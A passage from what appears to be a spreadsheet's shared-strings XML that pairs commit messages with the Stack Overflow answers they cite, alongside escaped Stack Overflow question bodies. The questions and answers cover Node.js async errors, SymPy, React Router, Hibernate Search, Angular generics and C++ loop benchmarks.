          :stores="item.stores"
          :slug="item.slug"
          :defaultStore="item.defaultStore"&gt;&lt;/GroceryFormItemStoresSelector&gt;
      &lt;/li&gt;
    &lt;/ol&gt;
  &lt;/form&gt;
&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;async function delay(ms) {
    return new Promise(r=&amp;gt;setTimeout(r,ms))
}
async function fail(ms){
    await delay(ms)
    throw new Error("kek");
}
async function ok(ms){
    await delay(ms)
    return 1;
}
async function start() {
    try{
        let fail_p = fail(500);
        let ok_p = ok(1000);
        console.log(await ok_p)
        console.log(await fail_p)
    }
    catch(e){
        console.log("ERR")
    }
}
start().then(()=&amp;gt;console.log("Finish"))&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;In the browser I get what I expected.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1
ERR
Finish
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But in nodejs the application just crashes with the error &amp;quot;kek&amp;quot;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/path/test.js:6
    throw new Error(&amp;quot;kek&amp;quot;);
          ^
Error: kek
    at fail (/path/test.js:6:11)
Node.js v22.14.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this a nodejs bug?&lt;br /&gt;
And how can I achieve the same behavior with nodejs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C13</t>
  </si>
  <si>
    <t>add human readable file size format function
by http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size</t>
  </si>
  <si>
    <t>Addressing the above "too small a task to require a library" issue by a straightforward implementation (using f-strings, so Python 3.6+):
def sizeof_fmt(num, suffix="B"):
    for unit in ("", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"):
        if abs(num) &lt; 1024.0:
            return f"{num:3.1f}{unit}{suffix}"
        num /= 1024.0
    return f"{num:.1f}Yi{suffix}"
Supports:
all currently known binary prefixes
negative and positive numbers
numbers larger than 1000 Yobibytes
arbitrary units (maybe you like to count in Gibibits!)
Example:
&gt;&gt;&gt; sizeof_fmt(168963795964)
'157.4GiB'
by Fred Cirera</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the expression&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Delta_T*(-S_xx*r**4 - S_xx*r**2*ri**2 - S_xx*r**2*ro**2 + S_xx*ri**2*ro**2 + S_yy*r**4 + S_yy*r**2*ri**2 + S_yy*r**2*ro**2 - S_yy*ri**2*ro**2)*cos(2*theta)/(4*r**2*(ri**2 + ro**2)*log(ro/ri)) - f(r) + g(theta) + (Delta_T*(S_xx + S_yy)*(ri**2 + ro**2)*log(r) - r**2*(Delta_T*S_xx*sin(theta)**2 - Delta_T*S_xx/2 - Delta_T*S_yy*sin(theta)**2 + Delta_T*S_yy/2) - (-2*Delta_T*S_xx*ri**2*ro**2*sin(theta)**2 + Delta_T*S_xx*ri**2*ro**2 + 2*Delta_T*S_yy*ri**2*ro**2*sin(theta)**2 - Delta_T*S_yy*ri**2*ro**2)/(2*r**2))/(2*ri**2*log(ro/ri) + 2*ro**2*log(ro/ri))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which should be equivalent to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g(theta) - f(r) + (2 * Delta_T * sp.log(r) * (S_xx + S_yy) + Delta_T * sp.cos(2 * theta) * (S_yy - S_xx)) / (4 * sp.log(ro / ri))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(there might be a minus sign difference, I am not sure, but it doesn't matter because these expressions are supposed to be worth 0)&lt;/p&gt;
&lt;p&gt;This means I should be able to separate &lt;code&gt;r&lt;/code&gt; from &lt;code&gt;theta&lt;/code&gt;. Or, in Sympy's words, &lt;code&gt;r&lt;/code&gt; from &lt;code&gt;sin(theta)**2, cos(2*theta)&lt;/code&gt;, but I wasn't able to progress. I tried an approach with &lt;code&gt;collect()&lt;/code&gt; to no avail.&lt;/p&gt;
&lt;p&gt;For example&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;expr_collected = sp.collect(V_r_integral - V_theta_integral, [r, sp.cos(theta)**2, sp.sin(theta)**2])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;yields&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Delta_T*(S_xx*ri**2*ro**2 - S_yy*ri**2*ro**2 + r**4*(-S_xx + S_yy) + r**2*(-S_xx*ri**2 - S_xx*ro**2 + S_yy*ri**2 + S_yy*ro**2))*cos(2*theta)/(4*r**2*(ri**2 + ro**2)*log(ro/ri)) - f(r) + g(theta) + (Delta_T*(S_xx + S_yy)*(ri**2 + ro**2)*log(r) + r**2*(Delta_T*S_xx/2 - Delta_T*S_yy/2 - (Delta_T*S_xx - Delta_T*S_yy)*sin(theta)**2) + (-Delta_T*S_xx*ri**2*ro**2/2 + Delta_T*S_yy*ri**2*ro**2/2 - (-2*Delta_T*S_xx*ri**2*ro**2 + 2*Delta_T*S_yy*ri**2*ro**2)*sin(theta)**2/2)/r**2)/(2*ri**2*log(ro/ri) + 2*ro**2*log(ro/ri))&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;and we see terms with r squared multiplying terms with &lt;code&gt;cos(2*theta)&lt;/code&gt;. Same with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;expr_collected = sp.collect(V_r_integral - V_theta_integral, [r**2, sp.cos(theta)**2, sp.sin(theta)**2, sp.cos(2*theta)])`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's a working example, the last line being the expression I want to recast:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import sympy as sp
r, theta, H0, ri, ro, rho, T_0, Delta_T, S_xx, S_yy = sp.symbols('r theta H0 ri ro rho T_0 Delta_T S_xx S_yy')
J_r = -2 * H0 * (1/r - 1/(ri**2 + ro**2)*(r + ri**2*ro**2/r**3)) * sp.cos(2*theta)
J_theta = -H0 * (1/(ri**2 + ro**2)*(2*r - 2*ri**2*ro**2/r**3)) * sp.sin(2*theta)
J_r = J_r.subs(H0, -(S_xx - S_yy) / (4 * rho) * Delta_T / sp.log(ro/ri))
J_theta = J_theta.subs(H0, -(S_xx - S_yy) / (4 * rho) * Delta_T / sp.log(ro/ri))
T = T_0 - Delta_T * sp.log(r/ro) / sp.log(ro/ri)
grad_T_r = sp.diff(T, r)
grad_T_theta = sp.diff(T, theta)
R = sp.Matrix([[sp.cos(theta), sp.sin(theta)],[-sp.sin(theta), sp.cos(theta)]])
S_cartesian = sp.Matrix([[S_xx, 0], [0, S_yy]])
S_polar = R*S_cartesian*R.T
S_rr = S_polar[0,0]
S_rtheta = S_polar[0,1]
S_thetar= S_polar[1,0]
S_thetatheta= S_polar[1,1]
V = sp.Function('V')(r, theta)
grad_V_r = sp.diff(V, r)
grad_V_theta = 1/r * sp.diff(V, theta)
sigma = 1/rho
eq_r = sp.Eq(J_r, -sigma * grad_V_r -sigma * (S_rr * grad_T_r + S_rtheta * grad_T_theta))
eq_theta = sp.Eq(J_theta, -sigma * grad_V_theta - sigma * (S_thetar * grad_T_r + S_thetatheta * grad_T_theta))
sol_grad_V_r = sp.solve(eq_r, grad_V_r)[0]
sol_grad_V_theta = sp.solve(eq_theta, grad_V_theta)[0]
f = sp.Function('f')(r)
g = sp.Function('g')(theta)
V_r_integral = sp.integrate(sol_grad_V_r, r) + g
V_theta_integral = sp.integrate(sol_grad_V_theta * r, theta) + f
print(V_r_integral - V_theta_integral)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C130</t>
  </si>
  <si>
    <t>Use better object inheritance for location components
Inspired from http://stackoverflow.com/a/7786090</t>
  </si>
  <si>
    <t xml:space="preserve">One way to do it:
function PhysicsBody( aNode ) {
    this.userData = aNode;
}
PhysicsBody.prototype.pbMethod = function () {};
function DynamicBody( aNode ) {
    PhysicsBody.call( this, aNode );
}
// setting up the inheritance
DynamicBody.prototype = Object.create( PhysicsBody.prototype );
DynamicBody.prototype.dbMethod = function () {};
Now, when you do
var pb = new PhysicsBody( '...' );
the instance pb gets a userData property and also inherits the methods from PhysicsBody.prototype (pbMethod in this case).
When you do
var db = new DynamicBody( '...' );
the instance db gets a userData property and also inherits the methods from DynamicBody.prototype (dbMethod in this case), which in turn inherits from PhysicsBody.prototype.
</t>
  </si>
  <si>
    <t xml:space="preserve">I might be an exception here but I have never worked on a team with more than three developers and / or five people. Still we could manage to get the job done (somehow).
Is there a software development process which fits this "extreme" scenario? And, if you work as a standalone programmer is there something you can adapt to your daily life to make it more predicatable, coherent, documented and still get the job done?
</t>
  </si>
  <si>
    <t>C131</t>
  </si>
  <si>
    <t>use ReactRouter component instead of render
- https://stackoverflow.com/a/48152635</t>
  </si>
  <si>
    <t>The source code tells the difference:
if (component)
  return match ? React.createElement(component, props) : null
if (render)
  return match ? render(props) : null
When you use component prop, the component is instantiated per every call of Route#render. It means that, for your component that you pass to component prop of Route, constructor, componentWillMount, and componentDidMount will be executed every time the route is rendered.
For example, if you have
&lt;Route path="/:locale/store" component={Store} /&gt;
and the user navigates to /en/store, then goes elsewhere, and then navigates back to /en/store, the Store component will be mounted, then unmounted, and then mounted again. It is similar to doing
&lt;Route path="/:locale/store"&gt;
  &lt;Store /&gt;
&lt;/Route&gt;
Compared to that, if you use render prop, the component is evaluated on every Route#render. Remember that every component is a function? This function will be executed as is, without any lifecycle methods. So when you have it like
&lt;Route path="/:locale/store" render={Store} /&gt;
you can think of it as
&lt;Route path="/:locale/store"&gt;
  {Store()}
&lt;/Route&gt;
It saves you runtime because no lifecycle methods are run, but it also has a downside in case Store component has some post-mount lifecycle methods like shouldComponentUpdate that may increase performance as well.
There was a good post on Medium about this performance hack, please take a look at it. It's written very well and is applicable to React 16, too.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Hibernate Search 5 in my project. I have a global search and filter mechanism. I apply a wildcard-based search similar to &amp;quot;like&amp;quot; and also allow searching by specific fields. However, when performing a range search on date values, I am not getting any results. The logs confirm that the relevant value has been indexed. The related code blocks are as follows. So What exactly is my problem according to the codes below? What am I not seeing?&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;@Column(name = &amp;quot;created_at&amp;quot;, updatable = false)
@Field(name = &amp;quot;createdAt&amp;quot;, analyze = Analyze.NO)
@SortableField(forField = &amp;quot;createdAt&amp;quot;)
@FieldBridge(impl = SearchableSortableOffsetDateTimeBridge.class)
@CreationTimestamp
protected OffsetDateTime createdAt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Field bridge is here :&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;public class SearchableSortableOffsetDateTimeBridge implements TwoWayFieldBridge {
    private static final DateTimeFormatter FORMATTER = DateTimeFormatter.ofPattern(&amp;quot;dd-MM-yyyy&amp;quot;);
    @Override
    public void set(String name, Object value, Document document, LuceneOptions luceneOptions) {
        if (value != null) {
            OffsetDateTime date = (OffsetDateTime) value;
            long millis = date.toInstant().toEpochMilli();
            String formattedDate = FORMATTER.format(date);
            document.add(new NumericDocValuesField(name + &amp;quot;_long&amp;quot;, millis));
            document.add(new StoredField(name + &amp;quot;_long&amp;quot;, millis));
            document.add(new StringField(name, formattedDate, Field.Store.YES));
        }
    }
    @Override
    public Object get(String name, Document document) {
        String dateString = document.get(name);
        if (dateString != null) {
            return FORMATTER.parse(dateString);
        }
        return null;
    }
    @Override
    public String objectToString(Object object) {
        if (object instanceof OffsetDateTime) {
            return FORMATTER.format((OffsetDateTime) object);
        }
        return object.toString();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and global search code is here :&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;QueryBuilder searchQueryBuilder = getQueryBuilder();
Query searchQuery = searchQueryBuilder.keyword()
                        .wildcard()
                        .onFields(fields)
                        .matching(&amp;quot;*&amp;quot; + specialCharacters(searchTerm) + &amp;quot;*&amp;quot;)
                        .createQuery();
// All query field
QueryBuilder queryBuilder = getQueryBuilder();
;
BooleanJunction&amp;lt;BooleanJunction&amp;gt; boolJunction = queryBuilder.bool();
// filter query
if (request.getFilter() != null) {
    if (request.getFilterList() == null) {
        request.setFilterList(new ArrayList&amp;lt;&amp;gt;());
    }
    request.getFilterList().add(request.getFilter());
}
if (request.getFilterList() != null) {
    for (ApiFilterRule apiFilterRule : request.getFilterList()) {
        if (apiFilterRule.getValue() == null || ((String) apiFilterRule.getValue()).length() &amp;lt; 1)
            continue;
        Query filterQuery = null;
        String filterTerm = null;
        QueryBuilder filterQueryBuilder = getQueryBuilder();
        if (apiFilterRule.getOperator().equals(OperatorType.EQUAL)
            || apiFilterRule.getOperator().equals(OperatorType.NOT_EQUAL)) {
            filterTerm = specialCharacters(String.valueOf(apiFilterRule.getValue()));
            filterQuery = filterQueryBuilder.keyword()
                              .wildcard()
                              .onFields(apiFilterRule.getField())
                              .matching(filterTerm)
                              .createQuery();
        } else if ((apiFilterRule.getOperator().equals(OperatorType.BETWEEN)
                       || apiFilterRule.getOperator().equals(OperatorType.NOT_BETWEEN))) {
            String[] values = ((String) apiFilterRule.getValue()).split(&amp;quot;,&amp;quot;);
            if (values.length == 2) {
                try {
                    Long lowerBound = Long.valueOf(values[0].trim());
                    Long upperBound = Long.valueOf(values[1].trim());
                    filterQuery = queryBuilder.range()
                                      .onField(apiFilterRule.getField() + &amp;quot;_long&amp;quot;)
                                      .from(lowerBound)
                                      .to(upperBound)
                                      .createQuery();
                } catch (NumberFormatException e) {
                    throw new IllegalArgumentException(&amp;quot;Invalid numeric range values: &amp;quot; + apiFilterRule.getValue(), e);
                }
            }
        } else {
            filterTerm = &amp;quot;*&amp;quot; + specialCharacters(String.valueOf(apiFilterRule.getValue())) + &amp;quot;*&amp;quot;;
            filterQuery = filterQueryBuilder.keyword()
                              .wildcard()
                              .onFields(apiFilterRule.getField())
                              .matching(filterTerm)
                              .createQuery();
        }
        if (filterQuery != null) {
            if (apiFilterRule.getOperator().equals(OperatorType.NOT_EQUAL)
                || apiFilterRule.getOperator().equals(OperatorType.NOT_BETWEEN)) {
                boolJunction.must(queryBuilder.all().except(filterQuery).createQuery());
            } else {
                boolJunction.must(filterQuery);
            }
        }
    }
}
// join filter and search
boolJunction.must(searchQuery);
Query query = boolJunction.createQuery();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit ------&lt;/p&gt;
&lt;p&gt;I replaced&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long millis = offsetDateTime.toInstant().toEpochMilli();
document.add(new NumericDocValuesField(name + &amp;quot;_long&amp;quot;, millis));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long millis = date.toEpochSecond();
document.add(new LongField(name + &amp;quot;_long&amp;quot;, millis, Field.Store.YES));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and date range filter is ok.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C132</t>
  </si>
  <si>
    <t>Adds bower.json + bower components
Pros/cons of listing bower components in source control.
http://stackoverflow.com/questions/22327758/should-bower-components-be-gitignored</t>
  </si>
  <si>
    <t>The official Bower page stated:
N.B. If you aren't authoring a package that is intended to be consumed by others (e.g., you're building a web app), you should always check installed packages into source control.
Make sure to check out the link in the quote, it discusses some pro and cons. The main pro it mentions is that checking them in ensures that your dependencies are always available, as long as your repository is available. No matter what happens to Bower, GitHub or whatever else would be needed otherwise.</t>
  </si>
  <si>
    <t>Adds bower.json + bower components
Pros/cons of listing bower components in source control.
http://stackoverflow.com/questions/22327758/should-bower-components-be-g
itignored</t>
  </si>
  <si>
    <t xml:space="preserve">I have a system in place which applies calculations to a set of numbers (the specifics aren't really relevant). There are a number of sets of calculations which can be applied by the system users and new sets are added frequently. Currently when a new set of calculations need to be added to the system they are added in to the code base and a new version of the system released. I'd like to be able to add new calculation sets into the system without having to release a whole new version and also to have these new calculations become visible to system users automatically. Currently a new function is created for each set of calculations and a record containing the appropriate function name is added to a system table. These records are visible to system users (function names are aliased of course!) who then select them from a list. The system uses the Eval() function to run the appropriate calculations.
This is a VB6/Access app that I inherited and am currently re-writing in VB.NET and SQL Server.
Does anyone have any advice on how best to do this?
</t>
  </si>
  <si>
    <t>C133</t>
  </si>
  <si>
    <t>webui: fix state update on unmounted component
Following this https://stackoverflow.com/questions/52061476/cancel-all-subscriptions-and-asyncs-in-the-componentwillunmount-method-how</t>
  </si>
  <si>
    <t>You can use isMounted React pattern to avoid memory leaks here.
In your constructor:
constructor(props) {
    super(props);
    this._isMounted = false;
// rest of your code
}
componentDidMount() {
    this._isMounted = true;
    this._isMounted &amp;&amp; this.getImage(this.props.item.image);
}
in your componentWillUnmount
componentWillUnmount() {
   this._isMounted = false;
}
While in you getImage()
async getImage(img) {
    let imgUri = await Amplify.Storage.get(img)
    let uri = await CacheManager.get(imgUri).getPath()
    this._isMounted &amp;&amp; this.setState({
        image: { uri },
        ready: true
    })
}
A recommend approach to use Axios which is based cancellable promise pattern. So you can cancel any network call while unmounting the component with it's cancelToken subscription. Here is resource for Axios Cancellation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is my Kusto query&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;KustoFunctionA(&amp;quot;GUID_VALUE&amp;quot;) 
| extend Name = todynamic(Name)
| mv-apply Name to typeof(string) on ( extend values = KustoFunctionB(Name) | project Name)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get an error stating that the KustoFunctionB requires a scalar value, but I was under the impression that mv-apply iterates over a list of values and provides a scalar value and not a list to whatever is inside the on block.&lt;/p&gt;
&lt;p&gt;I have a list of string values from a column and I have the KustoFunctionB and I would like to pass each string value from the column into the Kusto Function and return a table with the original string value and its kusto function value&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C134</t>
  </si>
  <si>
    <t>changed RoomModule following this:
  https://stackoverflow.com/questions/44083243/dagger-2-component-builder-is-missing-setters-for-required-modules-or-componen</t>
  </si>
  <si>
    <t>Remove the below code from the AppModule.class and rebuild the project
@Provides
    @Singleton
    Application provideContext(SomeApplication application) {
        return application;
    }</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not very experienced at using ASP.NET, but I've used built in membership providers for simple WebForms application, and I found them PITA when trying to extend the way they work (add/remove few fields and redo controls accordingly).
Now I'm preparing for MVC (ASP.NET MVC or Monorail based) project, and I'm thinking - is there a better way to handle users? Have them log in/log out, keep certain parts of the site available to certain users (like logged in users, or something similar to "share this with friends" feature of many social networking sites, where you can designate users that have access to certain things.
How best to acheave this in the way that will scale well?
I guess, I wasn't clear on that. To rephrase my question:
Would you use standard ASP.NET membership provider for a web-facing app, or something else (what)?
</t>
  </si>
  <si>
    <t>C135</t>
  </si>
  <si>
    <t>Expanding input field component Based on https://stackoverflow.com/a/7168967</t>
  </si>
  <si>
    <t>I just wrote this for you, I hope you like it :) No guarantees that it's cross-browser, but I think it is :)
(function() {
  var min = 100,
    max = 300,
    pad_right = 5,
    input = document.getElementById('adjinput');
  input.style.width = min + 'px';
  input.onkeypress = input.onkeydown = input.onkeyup = function() {
    var input = this;
    setTimeout(function() {
      var tmp = document.createElement('div');
      tmp.style.padding = '0';
      if (getComputedStyle)
        tmp.style.cssText = getComputedStyle(input, null).cssText;
      if (input.currentStyle)
        tmp.style = input.currentStyle;
      tmp.style.width = '';
      tmp.style.position = 'absolute';
      tmp.innerHTML = input.value.replace(/&amp;/g, "&amp;amp;")
        .replace(/&lt;/g, "&amp;lt;")
        .replace(/&gt;/g, "&amp;gt;")
        .replace(/"/g, "&amp;quot;")
        .replace(/'/g, "&amp;#039;")
        .replace(/ /g, '&amp;nbsp;');
      input.parentNode.appendChild(tmp);
      var width = tmp.clientWidth + pad_right + 1;
      tmp.parentNode.removeChild(tmp);
      if (min &lt;= width &amp;&amp; width &lt;= max)
        input.style.width = width + 'px';
    }, 1);
  }
})();
#adjinput {
  width: 100px;
}
&lt;input type = 'text' value='' id='adjinput' /&gt;
Run code snippetEdit code snippet
Expand Snippet</t>
  </si>
  <si>
    <t>Expanding input field component
Based on https://stackoverflow.com/a/7168967</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of objects I am receiving in an HTTP Post body.  Looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  load: {
     stops: [
          { 
            Name: &amp;quot;Stop 1&amp;quot;,
            AppointmentDateTime: &amp;quot;02/25/2025T14:00:00&amp;quot;
          },
          { 
            Name: &amp;quot;Stop 2&amp;quot;,
            AppointmentDateTime: &amp;quot;02/25/2025T13:00:00&amp;quot;
          },
          { 
            Name: &amp;quot;Stop 3&amp;quot;,
            AppointmentDateTime: &amp;quot;02/25/2025T15:30:00&amp;quot;
          }
      ]
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have already got a fluid validator in C# working with some of the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RuleForEach(x =&amp;gt; x.Stops).ChildRule(stop =&amp;gt; 
{
   stop.RuleFor(s =&amp;gt; s.Name).NotEmpty().NotNull();
   stop.RuleFor(s =&amp;gt; s.AppointmentDateTime).NotEmpty().NotNull().Must(x =&amp;gt; x &amp;gt; x.DateTime.Now).WithMessage(&amp;quot;AppointmentDateTime must be in the future&amp;quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While this works, I would like to validate that the items in the array are after each other.  Stop 2 should have an appointment time after stop 1 and stop 3 after stop 2 etc.  I can't find a way in the code to do something like a for loop where I can save the previous item value.  Ideally I was going to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Stop? prevStop = null;
foreach (stop in stops) {
  if (!prevStop is null)
    {
     DO SOMETHING TO validate that prevStop.AppointmentDateTime &amp;gt; stop.AppointmentDateTime;
    }
  prevStop = stop;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While there is a foreach like way of testing the items, I don't see a way to save the previous item for comparison to the current one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C136</t>
  </si>
  <si>
    <t>Add new judge recusal component
Reference for doing multiple form inputs in SweetAlerts:
https://sweetalert2.github.io/#multiple-inputs
Custom validations in SweetAlerts:
https://stackoverflow.com/a/54582551
Refs: #2875</t>
  </si>
  <si>
    <t>If you just want to make sure that the first input (i.e. swal-input2) is not null, then you simply need to add preConfirm like that:
    preConfirm: () =&gt; {
      if (document.getElementById('swal-input2').value) {
         // Handle return value 
      } else {
        Swal.showValidationMessage('First input missing')	
      }
    }
You can find the working solution here</t>
  </si>
  <si>
    <t xml:space="preserve">I have an application (an IP conferencing service) that I need to scale. It has quite a few independent components/applications, written in different languages (mainly C++ and PHP, some Perl). Currently a single installation runs on 5 machines, with 1-2 components sharing a single box. The configuration of each box therefore is different, so it's a pain to scale the whole thing, not to mention maintenance. 
The individual components vary from media proxies to message proxies and databases, so load is everything but even.
I was thinking about putting all components on a single machine and add more boxes as I go along with some sort of a load balancer in front. Others advised me to scale the other way - add specialized boxes where the app load gets high - but this leads back to the maintenance nightmare.
Do you know resources where I should start? Ideally I'd need some benchmarks which approach is better in terms of performance? (thinking aloud, when I have X amount of load and Y amount of memory and processing power where does it matter how I allocate it?)
</t>
  </si>
  <si>
    <t>C137</t>
  </si>
  <si>
    <t>Make another Angular component to extend on the generic. Seems like
 a niche minority way of doing things https://stackoverflow.com/questions/57970640/angular-8-generic-component</t>
  </si>
  <si>
    <t>I didn't like the answer I was given, so I decided to have a craic myself.
This was my solution (this is the list component):
import { Component, OnInit, ViewChild } from '@angular/core';
import { FilterResource } from 'src/app/_core/models/filter-resource';
import { ConfirmationDialogComponent } from '../confirmation-dialog/confirmation-dialog.component';
import { BaseSaveComponent } from './base-save.component';
import { DataService } from 'src/app/_core/services/data.service';
@Component({
    selector: 'app-base-list',
    templateUrl: './base-list.component.html',
    styleUrls: ['./base-list.component.scss'],
})
export class BaseListComponent&lt;T extends FilterResource&gt; implements OnInit {
    @ViewChild(ConfirmationDialogComponent, { static: true }) confirmationDialog: ConfirmationDialogComponent;
    @ViewChild(BaseSaveComponent, { static: true }) saveForm: BaseSaveComponent&lt;T&gt;;
    items: T[];
    constructor(private dataService: DataService&lt;T&gt;, private deleteMessage: string) {}
    ngOnInit() {
        this.dataService.items.subscribe(items =&gt; (this.items = items));
    }
    openModal(id: number) {
        this.confirmationDialog.message = this.deleteMessage;
        this.confirmationDialog.open();
        this.confirmationDialog.closed.subscribe(() =&gt; {
            this.dataService.delete(id);
        });
    }
    openSaveForm(model: T) {
        this.saveForm.id = model.id;
        this.saveForm.feedId = model.feedId;
        this.saveForm.open();
    }
}
FilterResource
is just this:
export class FilterResource {
    public id: number;
    public feedId: number;
}
And my
DataService
was generic anyway:
import { Injectable } from '@angular/core';
import { HttpClient } from '@angular/common/http';
import { map } from 'rxjs/operators';
import { environment } from '@environments/environment';
import { Resource } from '../models/resource';
import { ToastrService } from 'ngx-toastr';
import { BehaviorSubject } from 'rxjs';
@Injectable({
    providedIn: 'root',
})
export class DataService&lt;T extends Resource&gt; {
    items: BehaviorSubject&lt;T[]&gt;;
    constructor(private endpoint: string, private http: HttpClient, private toastr: ToastrService) {
        this.items = new BehaviorSubject&lt;T[]&gt;([]);
    }
    initialize(feedId: number) {
        this.http.get&lt;T[]&gt;(`${environment.apiUrl}/feeds/${feedId}/${this.endpoint}`).subscribe(response =&gt; {
            this.items.next(response);
        });
    }
    get(id: number) {
        return this.http.get&lt;T&gt;(`${environment.apiUrl}/${this.endpoint}/${id}`);
    }
    create(filter: T) {
        return this.http.post&lt;T&gt;(`${environment.apiUrl}/${this.endpoint}`, filter).pipe(
            map((response: any) =&gt; {
                const message = response.message;
                const item = response.model;
                let items = this.items.value;
                items.push(item);
                this.emit(items, message);
                return response.model;
            }),
        );
    }
    update(filter: T) {
        return this.http.put&lt;T&gt;(`${environment.apiUrl}/${this.endpoint}`, filter).pipe(
            map((response: any) =&gt; {
                const message = response.message;
                const item = response.model;
                let items = this.items.value;
                this.remove(items, filter.id);
                items.push(item);
                this.emit(items, message);
                return response.model;
            }),
        );
    }
    delete(id: number) {
        this.http.delete&lt;any&gt;(`${environment.apiUrl}/${this.endpoint}/${id}`).subscribe(response =&gt; {
            let items = this.items.value;
            items.forEach((item, i) =&gt; {
                if (item.id !== id) return;
                items.splice(i, 1);
            });
            this.emit(items, response.message);
        });
    }
    private remove(items: T[], id: number) {
        items.forEach((item, i) =&gt; {
            if (item.id !== id) return;
            items.splice(i, 1);
        });
    }
    private emit(items: T[], message: string) {
        this.items.next(items);
        this.toastr.success(message);
    }
}
So what this meant is that I was able to extend the component:
import { Component } from '@angular/core';
import { Filter } from '@models';
import { FilterService } from '@services';
import { BaseListComponent } from '../base/base-list.component';
@Component({
    selector: 'app-filters',
    templateUrl: './filters.component.html',
    styleUrls: ['./filters.component.scss'],
})
export class FiltersComponent extends BaseListComponent&lt;Filter&gt; {
    constructor(filterService: FilterService) {
        super(filterService, 'Deleting a filter is irreversible. Do you wish to continue?');
    }
}
I did the save in the same way.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two C++ implementations that count pairs ((x, y)) satisfying ((x + y) % 7 == 0).   Method 1 skips unnecessary iterations using &lt;code&gt;y += 6&lt;/code&gt;, while Method 2 checks every &lt;code&gt;y&lt;/code&gt;.   I performed benchmarks on both small and large ranges, and here are my results.&lt;/p&gt;
&lt;h3&gt;Code for Both Methods (Smaller Range)&lt;/h3&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;chrono&amp;gt;
using namespace std;
using namespace std::chrono;
void method1(long long &amp;amp;comparisons) {
    int count = 0;
    comparisons = 0;
    for (int x = 50; x &amp;lt;= 300; ++x) {  
        int start = max(70, x + 1);
        for (int y = start; y &amp;lt;= 400; y++) {
            ++comparisons;
            if ((x + y) % 7 == 0) {
                ++count;
                y += 6; // Optimization: Skipping unnecessary checks
            }
        }
    }
    cout &amp;lt;&amp;lt; &amp;quot;Method 1 count: &amp;quot; &amp;lt;&amp;lt; count &amp;lt;&amp;lt; &amp;quot;\n&amp;quot;;
    cout &amp;lt;&amp;lt; &amp;quot;Method 1 comparisons: &amp;quot; &amp;lt;&amp;lt; comparisons &amp;lt;&amp;lt; &amp;quot;\n&amp;quot;;
}
void method2(long long &amp;amp;comparisons) {
    int count = 0;
    comparisons = 0;
    for (int x = 50; x &amp;lt;= 300; ++x) {  
        int start = max(70, x + 1);
        for (int y = start; y &amp;lt;= 400; ++y) {
            ++comparisons;
            if ((x + y) % 7 == 0) {
                ++count;
            }
        }
    }
    cout &amp;lt;&amp;lt; &amp;quot;Method 2 count: &amp;quot; &amp;lt;&amp;lt; count &amp;lt;&amp;lt; &amp;quot;\n&amp;quot;;
    cout &amp;lt;&amp;lt; &amp;quot;Method 2 comparisons: &amp;quot; &amp;lt;&amp;lt; comparisons &amp;lt;&amp;lt; &amp;quot;\n&amp;quot;;
}
int main() {
    long long comparisons1, comparisons2;
    auto start1 = high_resolution_clock::now();
    method1(comparisons1);
    auto end1 = high_resolution_clock::now();
    double time1 = duration&amp;lt;double&amp;gt;(end1 - start1).count();
